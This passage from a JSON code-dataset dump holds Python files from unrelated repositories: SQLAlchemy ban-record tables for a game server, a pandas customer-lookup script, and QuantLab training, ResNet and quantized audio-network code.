target_name = Column(String(16), nullable=False)\n \n server_id = Column(Integer, ForeignKey(table_names['ServerInstance']+'.id'), nullable=False)\n \n master_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n master_ip = Column(BigInteger, nullable=True)\n master_name = Column(String(16), nullable=False)\n \n created_time = Column(DateTime, nullable=False)\n modified_time = Column(DateTime, nullable=False)\n expiry_type = Column(Integer, nullable=False)\n expiry_time = Column(DateTime(), nullable=True)\n \n expiry_types = enum(NEVEREXPIRES=-1, EXPIRYDATE=0)\n \n expired = Column(Boolean)\n \n reason = Column(String(128))\n \n effect_type = relationship('PunitiveEffectType')\n \n def __init__(self, effect_type, target_id, target_ip, target_mask, target_name, \n master_id, master_ip, master_name, reason):\n \n self.effect_type = effect_type\n \n self.target_id = target_id\n self.target_ip = target_ip\n self.target_mask = target_mask\n self.target_name = target_name\n \n self.master_id = master_id\n self.master_ip = master_ip\n self.master_name = master_name\n \n self.created_time = datetime.datetime.now()\n self.modified_time = datetime.datetime.now()\n self.expiry_type = self.effect_type.default_expiry_type\n if self.expiry_type != NEVEREXPIRES:\n self.expiry_time = datetime.datetime.fromtimestamp(time.time()+self.effect_type.default_duration)\n else:\n self.expiry_time = None\n \n self.expired = False\n \n self.reason = reason\n\n @staticmethod\n def query_expired(query):\n query = query.filter(not PunitiveEffect.expired)\n return query.filter(and_(PunitiveEffect.expiry_type!=EXPIRYDATE, \n PunitiveEffect.expiry_time>datetime.datetime.now()))\n \n @staticmethod\n def expire(effect_id):\n \"If a matching effect was found unexpired set it to expired and return True else return False.\"\n try:\n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect)\n punitive_effect_query = punitive_effect_query.filter(PunitiveEffect.id==effect_id)\n punitive_effect_query = punitive_effect_query.filter(not PunitiveEffect.expired)\n \n punitive_effect = punitive_effect_query.one()\n \n punitive_effect.expiry_type = EXPIRED\n session.commit()\n \n return True\n except NoResultFound:\n return False" }, { "alpha_fraction": 0.6114790439605713, "alphanum_fraction": 0.6158940196037292, "avg_line_length": 40.272727966308594, "blob_id": "03cc2b9b49ac9092755c8db5ef10ca9184f5ec9a", "content_id": "e0c9f85343ecdb354e001ce39f74aac7419b08c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/src/BaseTables/Mode.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Mode(database_manager.Base):\n __tablename__ = table_names['Mode']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n \n game_id = Column(SmallInteger, ForeignKey(table_names['Game']+'.id'), nullable=False)\n \n number = Column(SmallInteger, nullable=False)\n name = Column(String(16), nullable=False)" }, { "alpha_fraction": 0.6298932433128357, "alphanum_fraction": 0.6298932433128357, "avg_line_length": 42.30769348144531, "blob_id": "c47bcd96e2a9dcf8ce9f39c1f01ada7f9424ee2e", "content_id": "03cb29fb956b3bfb8f8d6d22ed97000b6d0b0b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 562, 
"license_type": "no_license", "max_line_length": 99, "num_lines": 13, "path": "/src/BaseTables/ActivitySpan.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ActivitySpan(database_manager.Base):\n __tablename__ = table_names['ActivitySpan']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n \n type = Column(SmallInteger, nullable=False)\n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n millis = Column(Integer, nullable=False)" } ]
30
jmt7080/IST303_GroupProject_MW
https://github.com/jmt7080/IST303_GroupProject_MW
78f73ed5153c1a57c401edaa22cb082f97b92de9
a45128399d654aee6bed9738d82d53f27e7addfe
b883d0e68bcc1549e0d8870c29fc7790dc6fd941
refs/heads/master
2021-01-20T09:24:11.979271
2016-05-30T04:48:42
2016-05-30T04:48:42
59,793,017
0
0
null
2016-05-27T00:58:09
2016-05-26T19:48:08
2016-05-26T19:48:07
null
[ { "alpha_fraction": 0.5505896806716919, "alphanum_fraction": 0.5630043745040894, "avg_line_length": 24.31147575378418, "blob_id": "69851b7e312347c61ee32bf98123158e7095ebde", "content_id": "d18561d595541f322f922fcdb6997a66ff22e07e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 97, "num_lines": 61, "path": "/IST303Project.py", "repo_name": "jmt7080/IST303_GroupProject_MW", "src_encoding": "UTF-8", "text": "#from Tkinter import *\r\n#root = Tk()\r\n#root.mainloop()\r\nfrom datetime import *\r\nimport csv\r\nimport pandas as pd\r\n\r\nguest_list = pd.read_csv(\"C:\\Users\\MSI CES 2014\\Documents\\IST 303 GuestList.csv\", index_col = 0)\r\nservice_list = pd.read_csv(\"C:\\Users\\MSI CES 2014\\Documents\\IST 303 services.csv\", index_col = 0)\r\n\r\n\r\n\r\nclass customer:\r\n\r\n def __init__(self, input_id):\r\n self.input_id = input_id\r\n\r\n def check_for_cust(self):\r\n for lab, row in guest_list.iterrows():\r\n if answer.input_id== lab:\r\n print \"yes\"\r\n return True\r\n print \"no\"\r\n return False\r\n\r\n def lookup_service(self):\r\n #if not customer.check_for_cust():\r\n # return\r\n for lab, row in guest_list.iterrows():\r\n if answer.input_id == lab:\r\n print \"Customer ID is valid. Here are the reservation info\"\r\n print row\r\n for lab1, row1 in service_list.iterrows():\r\n if answer.input_id == lab1:\r\n print row1\r\n print \"No reservation yet\"\r\n return\r\n print \"Customer ID is not valid\"\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass reservations(customer):\r\n def __init__(self, mineral_bath, massage, facial, specialty):\r\n self.mineral_bath = mineral_bath\r\n self.massage = massage\r\n self.facial = facial\r\n self.specialty = specialty\r\n\r\n\r\n\r\n\r\n#answer = customer(input(\"Enter customer ID\"))\r\n#answer.check_for_cust()\r\n\r\n\r\nanswer = customer(input(\"Enter customer ID\"))\r\n#answer.check_for_cust()\r\nanswer.lookup_service()\r\n\r\n\r\n\r\n" } ]
1
xiaywang/QuantLab
https://github.com/xiaywang/QuantLab
8fe1d4ce65fc7cd0c897828f8fe1a129b3b4eb50
32343d6aff528f9285ab72e3f936e264ed11ec38
2f2f1ebbb4ff4d7d79682b489ff6d431064b9929
refs/heads/master
2023-01-13T06:24:42.654078
2020-11-20T12:51:55
2020-11-20T12:51:55
261,223,022
0
0
null
2020-05-04T15:27:22
2020-04-17T12:20:31
2020-02-26T12:35:00
null
[ { "alpha_fraction": 0.5164769291877747, "alphanum_fraction": 0.5266626477241516, "avg_line_length": 34.51063919067383, "blob_id": "f51f7e213d61b831b001dd6cb422db6c05b65b9c", "content_id": "98e395b7489a806a5d06808234cd355e5686a99b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1669, "license_type": "permissive", "max_line_length": 118, "num_lines": 47, "path": "/quantlab/BCI-CompIV-2a/utils/meter.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport math\n\n\nclass Meter(object):\n def __init__(self, pp_pr, pp_gt):\n self.n_tracked = None\n self.loss = None\n self.avg_loss = None\n # main metric is classification error\n self.pp_pr = pp_pr\n self.pp_gt = pp_gt\n self.start_metric = 0.0\n self.correct = None\n self.avg_metric = None\n self.reset()\n\n def reset(self):\n self.n_tracked = 0\n self.loss = 0.\n self.avg_loss = 0.\n self.correct = 0\n self.avg_metric = self.start_metric\n\n def update(self, pr_outs, gt_labels, loss, track_metric=False):\n gt_labels = self.pp_gt(gt_labels)\n batch_size = len(gt_labels)\n self.n_tracked += batch_size\n # update loss\n self.loss += loss * batch_size\n self.avg_loss = self.loss / self.n_tracked\n if track_metric:\n # update main metric\n pr_labels = self.pp_pr(pr_outs)\n assert len(pr_labels) == len(gt_labels), 'Number of predictions and number of ground truths do not match!'\n for i in range(len(pr_labels)):\n self.correct += pr_labels[i] == gt_labels[i]\n self.avg_metric = (self.correct / self.n_tracked)\n\n def is_better(self, current_metric, best_metric):\n # compare classification errors\n return current_metric > best_metric\n\n def bar(self):\n return '| Loss: {loss:8.5f} | Accuracy: {acc:6.2f}%%'.format(loss=self.avg_loss,\n acc=self.avg_metric * 100)\n" }, { "alpha_fraction": 0.6115989089012146, "alphanum_fraction": 0.6146620512008667, "avg_line_length": 45.63809585571289, "blob_id": "6257e3a306db6422b31bc194be7442856bd32b7a", "content_id": "d013b7214dc3d2bb786e6f2ab2069071821ff43f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4897, "license_type": "permissive", "max_line_length": 109, "num_lines": 105, "path": "/quantlab/treat/daemon.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.optim as optim\nimport torch.utils.data as tud\n\nimport itertools\n\nfrom quantlab.treat.thermo.thermostat import Thermostat\nimport quantlab.treat.algo.lr_schedulers as lr_schedulers\n\nclass DynamicSubsetRandomSampler(tud.Sampler):\n r\"\"\"Samples a fixed number of elements randomly from a dataset of fixed size without replacement.\n\n Arguments:\n numSamples: the number of samples to take\n datasetLen: the size of the dataset from which to draw samples\n \"\"\"\n\n def __init__(self, numSamples, datasetLen):\n assert(isinstance(datasetLen, int) or datasetLen.is_integer())\n assert(isinstance(numSamples, int) or numSamples.is_integer())\n self.datasetLen = datasetLen\n self.numSamples = numSamples\n\n def __iter__(self):\n numFullSets = self.numSamples // self.datasetLen\n numRemainingSamples = self.numSamples - numFullSets*self.datasetLen\n indexesAll = (i for i in list())\n for i in range(numFullSets):\n indexes = torch.randperm(self.datasetLen)\n indexesAll = 
itertools.chain(indexesAll, \n (i.item() for i in indexes))\n indexes = torch.randperm(self.datasetLen)[:numRemainingSamples]\n indexesAll = itertools.chain(indexesAll, \n (i.item() for i in indexes))\n return indexesAll\n\n def __len__(self):\n return self.numSamples\n\ndef get_algo(logbook, net):\n \"\"\"Return a training procedure for the experiment.\"\"\"\n # set ANA cooling schedule\n thr_config = logbook.config['treat']['thermostat']\n thr = Thermostat(net, **thr_config['params'])\n if logbook.ckpt:\n thr.load_state_dict(logbook.ckpt['treat']['thermostat'])\n # set algo algorithm\n opt_config = logbook.config['treat']['optimizer']\n opt = optim.__dict__[opt_config['class']](net.parameters(), **opt_config['params'])\n if logbook.ckpt:\n opt.load_state_dict(logbook.ckpt['treat']['optimizer'])\n lr_sched_config = logbook.config['treat']['lr_scheduler']\n lr_sched_dict = {**optim.lr_scheduler.__dict__, **lr_schedulers.__dict__}\n lr_sched = lr_sched_dict[lr_sched_config['class']](opt, **lr_sched_config['params'])\n if logbook.ckpt:\n lr_sched.load_state_dict(logbook.ckpt['treat']['lr_scheduler'])\n return thr, opt, lr_sched\n\n\ndef get_data(logbook, num_workers=10):\n \"\"\"Return data for the experiment.\"\"\"\n data_config = logbook.config['treat']['data']\n # make dataset random split consistent (to prevent training instances from filtering into validation set)\n rng_state = torch.get_rng_state()\n torch.manual_seed(1234)\n # load preprocessed datasets\n train_set, valid_set, test_set = logbook.module.load_data_sets(logbook.dir_data, data_config)\n # create random training set subselector for mini-epochs\n if 'epoch_size_train' in data_config.keys():\n shuffleTrain = False\n cfgVal = float(data_config['epoch_size_train'])\n# if cfgVal > 1:\n# assert(cfgVal.is_integer())\n# numSamples = int(cfgVal)\n# else:\n numSamples = int(cfgVal*len(train_set))\n# assert(numSamples <= len(train_set))\n samplerTrain = DynamicSubsetRandomSampler(numSamples, len(train_set))\n else:\n shuffleTrain, samplerTrain = True, None\n # create loaders\n if hasattr(train_set, 'collate_fn'): # if one data set needs `collate`, all the data sets should\n train_l = tud.DataLoader(train_set, batch_size=data_config['bs_train'], \n shuffle=shuffleTrain, sampler=samplerTrain, \n num_workers=num_workers, \n collate_fn=train_set.collate_fn)\n valid_l = tud.DataLoader(valid_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers, \n collate_fn=valid_set.collate_fn)\n test_l = tud.DataLoader(test_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers, \n collate_fn=test_set.collate_fn)\n else:\n train_l = tud.DataLoader(train_set, batch_size=data_config['bs_train'], \n shuffle=shuffleTrain, sampler=samplerTrain, \n num_workers=num_workers)\n valid_l = tud.DataLoader(valid_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers)\n test_l = tud.DataLoader(test_set, batch_size=data_config['bs_valid'], \n shuffle=True, num_workers=num_workers)\n torch.set_rng_state(rng_state)\n return train_l, valid_l, test_l\n" }, { "alpha_fraction": 0.5303713083267212, "alphanum_fraction": 0.5546000599861145, "avg_line_length": 40.7879638671875, "blob_id": "0a4e58a2c41106fdf6f0d7ca1a7a9be3c7cfd23f", "content_id": "97873b44e734af6a1773b1d3dfd5736a34f279b5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14652, "license_type": "permissive", "max_line_length": 121, "num_lines": 349, "path": 
"/quantlab/ImageNet/ResNet/resnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n# large parts of the code taken or adapted from torchvision\n\nimport math\nimport torch\nimport torch.nn as nn\n\n#from quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n 'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\n 'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\n 'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\n 'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\n}\n\nclass BasicBlock(nn.Module):\n expansion = 1\n __constants__ = ['downsample']\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, convGen=None):\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = convGen(inplanes, planes, kernel_size=3, stride=stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = convGen(planes, planes, kernel_size=3)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, convGen=None):\n super(Bottleneck, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n width = int(planes * (base_width / 64.)) * groups\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv1 = convGen(inplanes, width, kernel_size=1)\n self.bn1 = norm_layer(width)\n self.conv2 = convGen(width, width, kernel_size=3, \n stride=stride, groups=groups, dilation=dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = convGen(width, planes * self.expansion, kernel_size=1)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = 
self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, arch='resnet18', quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None,\n weightInqStrategy=\"magnitude\", weightInqQuantInit=None,\n quantSkipFirstLayer=False, quantSkipLastLayer=False, pretrained=False):\n \n super(ResNet, self).__init__()\n assert(quantAct == False)\n assert(quantSkipFirstLayer)\n assert(quantSkipLastLayer)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False) \n \n def convGen(in_planes, out_planes, kernel_size=None, stride=1, \n groups=1, dilation=1, firstLayer=False):\n \"\"\"3x3 convolution with padding\"\"\"\n \n if kernel_size == 3:\n padding = dilation\n elif kernel_size == 1:\n padding = 0\n elif kernel_size == 7:\n padding = 3\n else:\n assert(False)\n \n if firstLayer or not(quantWeights): \n return nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, groups=groups, bias=False, dilation=dilation)\n else:\n return INQConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, groups=groups, bias=False, dilation=dilation, \n numLevels=weightInqLevels, strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n \n class BasicBlockWrap(BasicBlock):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs, convGen=convGen)\n class BottleneckWrap(Bottleneck):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs, convGen=convGen)\n \n if arch == 'resnet18':\n block = BasicBlockWrap\n layers = [2, 2, 2, 2]\n elif arch == 'resnet34':\n block = BasicBlockWrap\n layers = [3, 4, 6, 3]\n elif arch == 'resnet50':\n block = BottleneckWrap\n layers = [3, 4, 6, 3]\n elif arch == 'resnet101':\n block = BottleneckWrap\n layers = [3, 4, 23, 3]\n elif arch == 'resnet152':\n block = BottleneckWrap\n layers = [3, 8, 36, 3]\n else:\n assert(False)\n \n self.createNet(block, layers, convGen,\n num_classes=1000, zero_init_residual=False, groups=1, \n width_per_group=64, replace_stride_with_dilation=None, norm_layer=None)\n \n if pretrained:\n from torch.hub import load_state_dict_from_url\n state_dict = load_state_dict_from_url(model_urls[arch])\n missing_keys, unexpected_keys = self.load_state_dict(state_dict, strict=False)\n \n missing_keys_nonInq = [s for s in missing_keys if not (s.endswith('.sParam') or s.endswith('.weightFrozen'))]\n assert(len(unexpected_keys) == 0)\n assert(len(missing_keys_nonInq) == 0)\n# if len(missing_keys) > 0:\n# print('load_state_dict -- missing keys:')\n# print(missing_keys)\n# if len(unexpected_keys) > 0:\n# print('load_state_dict -- unexpected keys:')\n# print(unexpected_keys)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n\n def createNet(self, block, layers, convGen, \n num_classes=1000, zero_init_residual=False, groups=1, \n width_per_group=64, replace_stride_with_dilation=None, norm_layer=None):\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution 
instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = convGen(3, self.inplanes, kernel_size=7, stride=2, firstLayer=True)\n# self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,\n# bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], \n convGen=convGen)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0], \n convGen=convGen)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1], \n convGen=convGen)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2], \n convGen=convGen)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, INQConv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n \n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False, convGen=None):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n convGen(self.inplanes, planes*block.expansion, \n kernel_size=1, stride=stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, withStats=False):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n \n if withStats:\n stats = []\n return stats, x\n\n return x\n \n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n \n \nif __name__ == \"__main__\":\n model = ResNet(arch='resnet18', quantAct=False, weightInqSchedule={}, \n quantSkipFirstLayer=True, quantSkipLastLayer=True, \n pretrained=True)\n \n loadModel = True\n if loadModel:\n # path = '../../../ImageNet/logs/exp038/saves/best-backup.ckpt' # BWN\n# path = '../../../ImageNet/logs/exp043/saves/best.ckpt' # 
TWN\n path = '../../../ImageNet/logs/exp054/saves/best.ckpt' # BWN\n fullState = torch.load(path, map_location='cpu')\n netState = fullState['indiv']['net']\n model.load_state_dict(netState)\n \n import matplotlib.pyplot as plt\n layerNames = list(netState.keys())\n selectedLayers = ['layer4.0.conv1', \n 'layer2.1.conv2', \n 'layer1.0.conv2']\n # selectedLayers = [l + '.weight' for l in selectedLayers]\n selectedLayers = [l + '.weightFrozen' for l in selectedLayers]\n _, axarr = plt.subplots(len(selectedLayers))\n for ax, layerName in zip(axarr, selectedLayers):\n plt.sca(ax)\n plt.hist(netState[layerName].flatten(), \n bins=201, range=(-3,3))\n plt.xlim(-3,3)\n plt.title(layerName)\n \n exportONNX = False\n if exportONNX:\n modelFullPrec = ResNet(arch='resnet18', quantAct=False, quantWeights=False, \n weightInqSchedule={}, \n quantSkipFirstLayer=True, \n quantSkipLastLayer=True, \n pretrained=True)\n dummyInput = torch.randn(1, 3, 224, 224)\n pbuf = torch.onnx.export(modelFullPrec, dummyInput, \n \"export.onnx\", verbose=True, \n input_names=['input'], \n output_names=['output'])\n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.49250349402427673, "alphanum_fraction": 0.5359135270118713, "avg_line_length": 37.49664306640625, "blob_id": "01543294f1ccedd89e9140eae5a021a362f963ed", "content_id": "56f9362cc3a5b2c633ada707eceb8d14179767bf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5736, "license_type": "permissive", "max_line_length": 98, "num_lines": 149, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/meyernet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\nimport math\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\n\nclass MeyerNet(nn.Module):\n \"\"\"Audio Event Detection quantized Network.\"\"\"\n def __init__(self, capacityFactor=1.0, version=1, \n quantized=True, quant_scheme=None, \n quantFirstLast=True, withTwoAct=False, noTimePooling=False):\n super().__init__()\n self.noTimePooling = noTimePooling\n \n def conv1quant(quant_scheme, ni, no, stride=1, padding=1): \n return StochasticConv2d(*quant_scheme, ni, no, kernel_size=1, \n stride=stride, padding=0, bias=False)\n def conv3quant(quant_scheme, ni, no, stride=1, padding=1): \n return StochasticConv2d(*quant_scheme, ni, no, kernel_size=3, \n stride=stride, padding=1, bias=False)\n def conv1float(quant_scheme, ni, no, stride=1, padding=1): \n return nn.Conv2d(ni, no, kernel_size=1, \n stride=stride, padding=0, bias=False)\n def conv3float(quant_scheme, ni, no, stride=1, padding=1): \n return nn.Conv2d(ni, no, kernel_size=3, \n stride=stride, padding=1, bias=False)\n if quantized:\n conv1 = conv1quant\n conv3 = conv3quant\n activ = lambda quant_scheme, nc: StochasticActivation(*quant_scheme, nc)\n if withTwoAct:\n activ2 = lambda nc: nn.ReLU(inplace=True)\n else:\n activ2 = lambda nc: nn.Identity()\n quantScheme = lambda s: quant_scheme[s] \n else:\n conv1 = conv1float\n conv3 = conv3float\n activ = lambda quant_scheme, nc: nn.ReLU(inplace=True)\n activ2 = lambda nc: nn.Identity()\n quantScheme = lambda s: None\n \n bnorm = lambda nc: nn.BatchNorm2d(nc) \n# bnorm = lambda nc: nn.Identity() # don't forget to enable/disable bias\n c = lambda v: math.ceil(v*capacityFactor)\n \n c1, c2, c3, c4, c5, c6 = c(64), c(64), c(128), c(128), c(128), c(128)\n if version >= 2: \n c1 = c(32)\n\n if 
quantFirstLast:\n self.phi1_conv = conv3(quantScheme('phi1_conv'), 1, c1)\n else: \n self.phi1_conv = conv3float(None, 1, c1)\n self.phi1_act2 = activ2(c1)\n self.phi1_bn = bnorm(c1)\n self.phi1_act = activ(quantScheme('phi1_act'), c1)\n \n self.phi2_conv = conv3(quantScheme('phi2_conv'), c1, c2, stride=2)\n self.phi2_act2 = activ2(c2)\n self.phi2_bn = bnorm(c2)\n self.phi2_act = activ(quantScheme('phi2_act'), c2)\n \n self.phi3_conv = conv3(quantScheme('phi3_conv'), c2, c3)\n self.phi3_act2 = activ2(c3)\n self.phi3_bn = bnorm(c3)\n self.phi3_act = activ(quantScheme('phi3_act'), c3)\n \n if version >= 3: \n self.phi4_do = nn.Dropout2d(0.5)\n else: \n self.phi4_do = nn.Identity()\n self.phi4_conv = conv3(quantScheme('phi4_conv'), c3, c4, stride=2)\n self.phi4_act2 = activ2(c4)\n self.phi4_bn = bnorm(c4)\n self.phi4_act = activ(quantScheme('phi4_act'), c4)\n \n self.phi5_conv = conv3(quantScheme('phi5_conv'), c4, c5)\n self.phi5_act2 = activ2(c5)\n self.phi5_bn = bnorm(c5)\n self.phi5_act = activ(quantScheme('phi5_act'), c5)\n \n self.phi6_conv = conv1(quantScheme('phi6_conv'), c5, c6)\n self.phi6_act2 = activ2(c6)\n self.phi6_bn = bnorm(c6)\n \n if quantFirstLast:\n self.phi6_act = activ(quantScheme('phi6_act'), c6)\n self.phi7_conv = conv1(quantScheme('phi7_conv'), c6, 28)\n else:\n self.phi6_act = nn.Identity()\n self.phi7_conv = conv1float(None, c6, 28)\n self.phi7_bn = bnorm(28)\n \n if noTimePooling:\n self.phi8_pool = nn.AvgPool2d(kernel_size=(16,1), stride=1, padding=0)\n else:\n self.phi8_pool = nn.AvgPool2d(kernel_size=(16,100), stride=1, padding=0)\n\n def forward(self, x, withStats=False):\n stats = []\n x = self.phi1_conv(x)\n x = self.phi1_act2(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_act2(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_act2(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_do(x)\n x = self.phi4_conv(x)\n x = self.phi4_act2(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_act2(x)\n x = self.phi5_bn(x)\n x 